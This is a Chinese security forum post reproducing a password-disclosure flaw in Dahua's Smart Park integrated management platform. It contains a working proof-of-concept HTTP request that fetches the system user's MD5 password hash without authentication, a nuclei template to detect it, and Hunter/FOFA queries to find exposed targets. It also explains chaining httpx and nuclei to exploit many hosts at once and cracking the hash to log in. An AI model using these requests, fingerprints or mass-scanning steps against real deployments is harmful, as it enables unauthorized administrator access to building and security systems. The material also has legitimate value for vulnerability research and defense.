大华智慧园区综合管理平台任意密码读取漏洞复现

守法好青年   ·   发表于 2023-10-18 23:12:48   ·   漏洞文章

大华智慧园区综合管理平台

漏洞成因

没有对接口进行严格的权限管理,导致可以通过访问user_getUserInfoByUserName.action获取system用户的MD5加密后的密码

hunter语法

web.icon="4644f2d45601037b8423d45e13194c93"&&web.title="智慧园区综合管理平台"

fofa语法的话我不知道怎么搞那个icon_hash,如果有大佬知道,求带带

POC

  1. GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
  2. Host: xxxxxxxxx
  3. Cookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CC
  4. Cache-Control: max-age=0
  5. Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
  6. Sec-Ch-Ua-Mobile: ?0
  7. Sec-Ch-Ua-Platform: "Windows"
  8. Upgrade-Insecure-Requests: 1
  9. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  10. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  11. Sec-Fetch-Site: none
  12. Sec-Fetch-Mode: navigate
  13. Sec-Fetch-User: ?1
  14. Sec-Fetch-Dest: document
  15. Accept-Encoding: gzip, deflate
  16. Accept-Language: zh-CN,zh;q=0.9
  17. X-Forwarded-For: 127.0.0.1
  18. Connection: close
  1. .yaml文件
  2. id: dahua
  3. info:
  4. name: Template Name
  5. author: wuwen
  6. severity: info
  7. description: description
  8. reference:
  9. - https://
  10. tags: tags
  11. requests:
  12. - raw:
  13. - |+
  14. GET /admin/user_getUserInfoByUserName.action?userName=system HTTP/1.1
  15. Host: {{Hostname}}
  16. Cookie: JSESSIONID=D99F6DAEA7EC0695266E95A1B1A529CC
  17. Cache-Control: max-age=0
  18. Sec-Ch-Ua: "Chromium";v="118", "Google Chrome";v="118", "Not=A?Brand";v="99"
  19. Sec-Ch-Ua-Mobile: ?0
  20. Sec-Ch-Ua-Platform: "Windows"
  21. Upgrade-Insecure-Requests: 1
  22. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
  23. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
  24. Sec-Fetch-Site: none
  25. Sec-Fetch-Mode: navigate
  26. Sec-Fetch-User: ?1
  27. Sec-Fetch-Dest: document
  28. Accept-Encoding: gzip, deflate
  29. Accept-Language: zh-CN,zh;q=0.9
  30. X-Forwarded-For: 127.0.0.1
  31. Connection: close
  32. matchers-condition: and
  33. matchers:
  34. - type: word
  35. part: body
  36. words:
  37. - loginPass
  38. - type: status
  39. status:
  40. - 200

访问之后就是这样


再将里面的loginpass内容MD5解密,


试了一下,很多就算用了付费的MD5解密也解不开,当然也有解得开的
,然后输入账号 密码,就可以登录了

速刷技巧

前两天听了月佬的课,知道了httpx和nuclei联动的强大,所以一起写在这里

httpx和nuclei的下载链接
  1. https://github.com/projectdiscovery/httpx/releases
  2. https://github.com/projectdiscovery/nuclei/releases
  3. burp插件,写nuclei的.yaml文件的
  4. https://github.com/projectdiscovery/nuclei-burp-plugin/releases
使用方法(我只会简单的利用,大佬当个乐子看就好)

首先使用httpx,我的是windows

  1. httpx.exe -l url.txt -mc 200 >> survival.txt
  2. 就是探测url.txt中的存活的地址(响应码为200 存到当前目录的survival.txt

然后使用burp抓取数据包(攻击成功的),选择部分返回包里的内容,使用插件nuclei


保存文件,应该是.yaml后缀的

最后就是使用nuclei了

  1. nuclei.exe -l survival.txt -t poc.yaml

如果成功的话就是这样(注意文件路径,如果不确定,就拉进去用绝对路径)

最后一定要去验证一下漏洞是否真的存在,然后再提交

通过这种联动,就可以批量打漏洞了,可能有写错的,希望大家指出,会修改的,我也是第一次用这种方法

用户名金币积分时间理由
Track-魔方 600.00 0 2023-10-19 21:09:07 深度 200 普适 200 可读 200

打赏我,让我更有动力~

附件列表

nuclei_2.9.15_windows_amd64.zip   文件大小:18.712M (下载次数:2)

httpx_1.3.5_windows_amd64 (1).zip   文件大小:12.405M (下载次数:2)

nuclei-burp-plugin-1.1.0.zip   文件大小:1.903M (下载次数:4)

3 条回复   |  直到 2023-10-27 | 752 次浏览

Track-魔方
发表于 2023-10-19

学以致用,点赞;
fofa语法:app=”dahua-智慧园区综合管理平台” && icon_hash=”-297069493”

评论列表

  • 加载数据中...

编写评论内容

qsacs
发表于 2023-10-26

师傅真猛!

评论列表

  • 加载数据中...

编写评论内容

苟子狗子钩子
发表于 2023-10-27

1

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.